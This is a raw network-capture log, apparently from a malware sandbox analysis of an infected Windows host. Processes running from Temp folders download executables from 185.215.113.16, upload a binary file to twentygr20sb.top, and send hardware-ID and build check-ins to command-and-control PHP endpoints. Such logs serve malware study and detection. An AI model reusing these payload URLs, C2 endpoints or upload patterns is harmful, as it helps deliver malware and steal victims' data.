Dec 16, 2024 11:04:43.561832905 CET	896	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:43.561865091 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:43.561899900 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:43.561934948 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: WTqP![h`;5Wc?Z4?1U^W>difk8sUhil ^e]_
Dec 16, 2024 11:04:43.562091112 CET	1236	IN	Data Raw: ee a5 0f 6e 30 2f 45 9f 77 8f ca ac 30 3b d2 15 f5 6d 52 a8 ad 05 7e b2 e6 5b ec 30 21 5b 52 e7 2f c8 d5 ad c9 e6 b8 91 31 60 06 d7 eb 0c d1 c6 e9 74 dd d3 25 0e bb e5 0b 5d 89 ac 64 7d b5 b1 85 09 cc c9 76 3d 16 c2 05 94 77 ba ca be 31 e2 cb 45 Data Ascii: n0/Ew0;mR~[0![R/1`t%]d}v=w1E=D5k;k92$\\dEQ%11l,*GA/U`[3+vMXmW 6BG[;3/{^k .@YNE?3OEC/k\|dQ'6&A4d
Dec 16, 2024 11:04:43.562125921 CET	1236	IN	Data Raw: 60 ff 94 d0 62 2e d3 d7 74 de 00 12 53 14 0a 27 5d 04 e7 2d 37 1c 80 e0 f8 fa c7 14 59 33 d5 0d 46 5f a6 ef 46 65 4f 37 69 cc e5 1e 4b 7e 05 9e 56 03 eb 5c bd ce cd 47 a9 93 0e bb 67 63 02 70 e8 1b e2 5f 55 f4 f1 11 18 6e f0 9c b7 c5 e7 0f 3c e6 Data Ascii: `b.tS']-7Y3F_FeO7iK~V\Ggcp_Un<sn7l8odTZ-AQ/-&>5kET8KhdVzBO:bwcVQi]ozm{#u2rV3("Zw1lVrL
Dec 16, 2024 11:04:43.681761980 CET	1236	IN	Data Raw: da fa 78 94 67 4c 12 01 5e aa d2 84 6d f1 49 42 ae 6a bc c2 05 2b aa 89 8e 6d 36 aa 02 2c ca 04 09 1c 0e 6c f2 f9 a4 d5 5b 97 51 f2 ea 05 b7 77 05 19 c4 07 78 0a d3 01 12 50 86 ea 72 1e 26 b8 19 bf 7f 52 41 8f bc fd f9 0c 46 b8 e6 09 e2 79 38 2a Data Ascii: xgL^mIBj+m6,l[QwxPr&RAFy8*FDVK'?rhB>?NQ(X#e\&+Rg<gf,h,]&O^P?MHG(a;/ia'BV'{~x13fY?r=Y7BLz1
Dec 16, 2024 11:04:48.425776005 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 16, 2024 11:04:48.863076925 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:48 GMT Content-Type: application/octet-stream Content-Length: 1854976 Last-Modified: Mon, 16 Dec 2024 09:29:36 GMT Connection: keep-alive ETag: "675ff300-1c4e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 30 6b 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 6b 00 00 04 00 00 82 2e 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg*0k@`k.@M$a$$ $h@.rsrc$x@.idata $z@ +$\|@qlmsectipP~@gcgddbmv k&@.taggant00k",@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50103	141.8.192.141	80	4476	C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:42.660837889 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: twentygr20sb.top Accept: / Content-Length: 30081 Content-Type: multipart/form-data; boundary=------------------------NUjHJVcMTd06kBuC5PqZE9 Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 4e 55 6a 48 4a 56 63 4d 54 64 30 36 6b 42 75 43 35 50 71 5a 45 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 54 61 79 65 7a 69 7a 65 7a 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 64 68 d9 1c cd fb ea c6 21 2a ab 6f 2c da ef 0b 27 45 4e 4b 63 5d 3e 81 29 8e 5b 7b 4d 94 5d 0a 3b da a3 33 2b d2 84 d4 1c 95 6a 0b 25 b5 7b f8 f1 13 df 57 24 e3 9f 1a 73 89 98 2c 83 80 fd 50 0c 84 28 58 54 3d 3f 1a ca 1b c4 0e c0 15 20 7e 4f e6 96 ae c0 cf e5 e8 d4 69 81 a9 82 a5 d3 3f 07 d2 64 68 57 d2 52 d5 36 a0 7c b6 50 cd 94 92 3f b7 79 ff 5c d1 b6 cd 83 5e 1d 5b db ce 58 ed 78 d9 ab 45 1b f2 26 c4 52 dc 93 22 ed 74 62 48 46 9d 64 b2 24 e6 47 51 fe c5 ed fb 40 23 49 62 38 57 49 2d 9b 0e 9b ce 24 4b b1 79 90 50 c1 [TRUNCATED] Data Ascii: --------------------------NUjHJVcMTd06kBuC5PqZE9Content-Disposition: form-data; name="file"; filename="Tayezizez.bin"Content-Type: application/octet-streamdh!o,'ENKc]>)[{M];3+j%{W$s,P(XT=? ~Oi?dhWR6\|P?y\^[XxE&R"tbHFd$GQ@#Ib8WI-$KyPG)2s35Fyhl!F/x&^Ru0Yl-~T}7(,a.5n~v\|! EeI2te65ys%9BJ _Hn"9MXO$UiG+qh:;vxujGXP)K4}cP7..IZE{!G>U6u^qBt3;mz?6/t}b{2~9R_j-hhT5s@^p%FZzIoiH769qb}y}1xZ%t5Mu..-Gh%/=5Cr5Bo5lw3~CyiXtz#-23Zs'LDmj\YTwa-4t\|\utmd(%7x0bX>r~jE!Pnq;be4)']r0SC[dC{eH[-y9`HnZEPeq6WN<f-\|&f*} [TRUNCATED]
Dec 16, 2024 11:04:42.780951977 CET	2472	OUT	Data Raw: 04 2c cc 95 a8 4d fe ac f5 1e 04 d4 90 64 d7 5e 9f 51 83 a6 90 c5 f2 0e c1 32 82 8d 37 52 16 4b c0 e6 2f b7 38 43 35 a2 b7 37 f1 c0 ed de 8a 53 0c 72 9c 4f bd 7c 1d ed 93 b4 c5 14 64 70 a5 2b 64 a4 93 d3 71 43 35 6d ee 23 6a 71 b9 2b b8 3c 9e aa Data Ascii: ,Md^Q27RK/8C57SrO\|dp+dqC5m#jq+<yWRCEE7LWVG-qvsairUqwC`&DJFlM<`<uSwGHE4qxt^[ZkD` hl/#z\|1Lt(4Hszb7x#
Dec 16, 2024 11:04:42.780996084 CET	2472	OUT	Data Raw: 44 86 26 6a c7 22 c8 16 ec 49 e0 9e 33 42 7c 6d e1 80 af 41 1b da da e4 37 a5 68 74 36 1a bc 1d ba 81 a4 93 d6 3d ac fd 2a d2 0a 99 49 dc 12 6c 17 33 a2 73 c5 b1 c1 ca 20 3c b3 37 d0 19 80 36 2e aa 15 54 35 29 a8 54 10 f7 be db d1 ed 5c f2 13 de Data Ascii: D&j"I3B\|mA7ht6=Il3s <76.T5)T\S7?Nf#W"T4zoDX?jy"\|o9UuNDn!mIOZ'L:%({RX_>q36x LjWrT5ryv<B>baQ/+
Dec 16, 2024 11:04:42.781007051 CET	2472	OUT	Data Raw: 6f d0 83 46 d1 fd 3f 5f ff 95 65 e5 25 77 e7 b2 32 a7 7c 14 a0 8e e0 93 f3 bd 0d 13 b3 f6 4f 12 47 89 db b8 47 e1 a7 5a 69 9c fd 60 06 1e 0a 16 04 15 4c 3d 1e 13 8c 29 c8 f9 9d 65 41 c2 26 72 08 da 1a 4f 67 64 4f 7e 35 d2 4f f9 9b fd 5f 4e b0 4a Data Ascii: oF?_e%w2\|OGGZi`L=)eA&rOgdO~5O_NJXVb},Hr@+M9zGsO5\|&dSs>%vm7<#E*eE)\UOf,!XD6mkI:DbbtKq}(Z8yWFxQiP
Dec 16, 2024 11:04:42.781143904 CET	2472	OUT	Data Raw: 5c 0a 28 aa f7 ed fe f9 3d f8 92 ae 21 97 9d 4e 1e 86 a4 fb ce a9 07 7b 2b bd 9e 2f cf ed fb 81 b6 f1 c8 e0 10 7b 03 90 89 7f 1a 32 b7 25 ef a6 2d 9f 81 86 0b de ef 44 af ae 40 ff 3a e1 a5 eb 4c de d4 36 78 d0 25 74 24 14 01 d6 54 bb ea 5e 7c a7 Data Ascii: \(=!N{+/{2%-D@:L6x%t$T^\|3ty\A 9[n?pW^4>\qUjJ0zp"Pm\EZt^f8]@}YptB$YKK$s]Zx1
Dec 16, 2024 11:04:42.781228065 CET	2472	OUT	Data Raw: 49 f7 5c 08 5a 77 43 e2 3f 69 f1 77 92 09 fe 70 15 65 f1 52 20 0c a6 67 4e f3 23 c3 a0 eb 7c 6e 54 04 26 87 2f 31 8b 55 55 43 ec 9e 88 c6 5c 4d af 2b dd ed 83 5f 09 2f 9d f9 f9 1a 0d 49 ca ac e9 8e a3 95 df 5b 47 a9 df 92 aa 9d ca bf 5a 20 3e 19 Data Ascii: I\ZwC?iwpeR gN#\|nT&/1UUC\M+_/I[GZ >3Dmubo!rb/Gl\#Z_JC~66%ZWZqH8OH\J]Z7z&ca"h)6!xoI;:0gw2:`#
Dec 16, 2024 11:04:42.781280041 CET	2472	OUT	Data Raw: 26 80 a4 c9 3f 4d 12 d4 28 dc dc 9f c8 f8 1e 74 f2 81 64 91 ae e2 f0 cd e6 28 df ab ee 31 dd 48 3e f3 8e e3 b9 af 82 98 64 4e d7 2e c8 2e ec 79 28 1e 9b 88 6e 75 4f a2 5f 7e f0 f1 93 4f 83 ab e9 14 6e 5c 60 4a fb 99 c2 aa 93 47 0e a5 dd 3a 71 f6 Data Ascii: &?M(td(1H>dN..y(nuO_~On\`JG:q+?)3Q]J?/G":O:k$BK\!PbGBZI= \|wV.;x4f('>ZO\5fw*eECK8<ZXjYK)d{8m}
Dec 16, 2024 11:04:42.781316996 CET	2472	OUT	Data Raw: a3 af b7 cf 0c 90 ba 76 af 92 3a 2d a8 66 1d 12 30 a8 ba d5 b1 6e 60 d2 38 67 48 4d 9a cf fb 94 2e 08 4e 0f 7e 8e 84 dd 2b bd c7 23 a7 f4 b6 35 3f 1b 05 41 1a 52 e9 05 1f 0c d6 86 8f 2e 77 f8 4e 1b 42 ae 8c 61 86 08 0b e2 88 31 8b be 83 c6 9b c0 Data Ascii: v:-f0n`8gHM.N~+#5?AR.wNBa1c0z+P(x1!"WM]l9`ld~W_PqCgc,<LP:Bef}@rFePvyi_uHRaC!s=\|s'De56D^kv
Dec 16, 2024 11:04:42.781436920 CET	601	OUT	Data Raw: d7 f5 01 9c 33 21 50 31 8b 57 81 84 d0 36 e2 5e 0e 20 85 34 20 d9 e2 c2 0f 8e 05 82 3f e6 65 6b 00 e6 02 6f 22 35 e9 89 77 de e8 dc 35 ea 85 f1 83 cf c8 73 d7 a1 03 b9 03 36 12 f9 d4 7c d1 9c 60 f1 66 63 d3 6d b6 d3 fa 80 04 01 3f ec 16 20 1a 4b Data Ascii: 3!P1W6^ 4 ?eko"5w5s6\|`fcm? K{K2u'$+CMM78nm:jL84juN un!~_b{C-VKa:J% o#rd9,;uzbQKol3C&XsX
Dec 16, 2024 11:04:44.291169882 CET	255	IN	HTTP/1.1 200 OK server: nginx date: Mon, 16 Dec 2024 10:04:44 GMT content-type: text/plain; charset=utf-8 content-length: 2 x-ratelimit-limit: 30 x-ratelimit-remaining: 27 x-ratelimit-reset: 1734345241 etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50104	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:43.389786005 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:04:44.970362902 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50106	185.215.113.206	80	1408	C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:45.734611034 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 16, 2024 11:04:47.068856001 CET	203	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 16, 2024 11:04:47.077934027 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEHJEHDBGHIDGDGHCBG Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 38 41 42 35 37 45 39 31 31 39 33 34 36 38 35 35 32 38 34 39 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 45 48 44 42 47 48 49 44 47 44 47 48 43 42 47 2d 2d 0d 0a Data Ascii: ------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="hwid"1D8AB57E91193468552849------IIEHJEHDBGHIDGDGHCBGContent-Disposition: form-data; name="build"stok------IIEHJEHDBGHIDGDGHCBG--
Dec 16, 2024 11:04:47.523685932 CET	210	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50107	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:46.749325991 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:04:48.079389095 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50110	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:49.798588991 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:04:51.142786980 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50112	185.215.113.16	80	7480	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:04:51.815613031 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 16, 2024 11:04:53.132143021 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:04:52 GMT Content-Type: application/octet-stream Content-Length: 2786816 Last-Modified: Mon, 16 Dec 2024 09:28:04 GMT Connection: keep-alive ETag: "675ff2a4-2a8600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 58 b2 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+X`Ui` @ @.rsrc`2@.idata 8@tzzztmlq@$:@jxlaistz ^@.taggant@+"d@
Dec 16, 2024 11:04:53.132177114 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:53.132193089 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:53.132350922 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:53.132368088 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:53.132383108 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:53.132400036 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 16, 2024 11:04:53.132595062 CET	1236	IN	Data Raw: 97 64 cd f4 af ff cf ad 38 30 ce 35 28 e6 f0 e3 9c bb ea d3 55 19 fa 93 6b 76 1c b7 fe b9 8b c1 50 e8 21 50 01 d7 4a 14 a1 af 10 de d1 1d 60 b4 05 75 b0 e3 49 6a d9 97 36 17 d3 99 06 6d 95 c2 11 62 c0 f3 af 6b c4 fb 5b 46 ad 9d 2c 40 d3 44 79 87 Data Ascii: d805(UkvP!PJ`uIj6mbk[F,@Dy:`AZ,hc0cCdS%Fk9DI8yY-CCf$E=OWr>0#N.[e#"1bY@5UWlBlJl9C-3bY
Dec 16, 2024 11:04:53.132611036 CET	1236	IN	Data Raw: 8c 63 b6 fd f3 63 b2 d1 9c 90 2d de 2e 48 bc 66 75 50 c0 d9 a7 19 1a d7 65 eb 11 ee 13 28 c2 f4 75 50 02 d4 97 08 fe f2 a4 59 44 76 13 63 f6 f3 75 04 b6 25 a8 2c e6 df 61 bf df 19 7c 48 5a bf a5 47 22 3a 2e e4 c8 6b 13 e8 a9 f4 b5 37 42 46 bd a0 Data Ascii: cc-.HfuPe(uPYDvcu%,a\|HZG":.k7BF9I24@RcN[uBNj=%y}uP~z\|yK.qi<b@?4d PAH%EQp2c<17L\}TS;\[(3`.P4lKB<
Dec 16, 2024 11:04:53.132626057 CET	1236	IN	Data Raw: 54 42 bd ee a9 20 b6 c2 48 0b 86 f4 40 8c ca 60 42 59 b8 25 84 73 12 8f 2f fe 0a 17 63 80 e0 8f 59 4b 0c 25 42 df 17 b1 86 fd 60 c3 15 3a 01 7f 45 68 e2 03 34 09 45 12 06 58 5c 12 57 f9 e5 3a bd 73 ea e6 07 fd f1 ec 44 b2 21 f5 bb d3 9c 41 f8 8e Data Ascii: TB H@`BY%s/cYK%B`:Eh4EX\W:sD!AT+DKivM\|^G%x6scRJbMRU<5rM_ZrrgOp9c6 cP2Wo3HZ6\7\|nWD9TJ3
Dec 16, 2024 11:04:53.252368927 CET	1236	IN	Data Raw: 3b 2b 6d 8a 1d 3c db b9 21 c0 d0 b0 da 5c 18 d5 31 73 cc 34 31 3c f6 c5 26 52 6a 0e 35 6b 6f e5 31 6c f4 e7 76 37 28 83 a8 7f 5e 1f 53 a9 b8 66 7c a6 dd f0 54 0a ae b5 75 5a c8 00 5c f7 e9 e7 2b 05 f0 f2 61 f9 f4 a6 f5 43 cf 84 e5 0d eb 32 55 80 Data Ascii: ;+m<!\1s41<&Rj5ko1lv7(^Sf\|TuZ\+aC2U~+aG'9868sFIHlz=8lM/N.bHChZ'a,Q/-PgLCcMW;2R+j_DEywI
Dec 16, 2024 11:04:58.108858109 CET	205	OUT	GET /steam/random.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
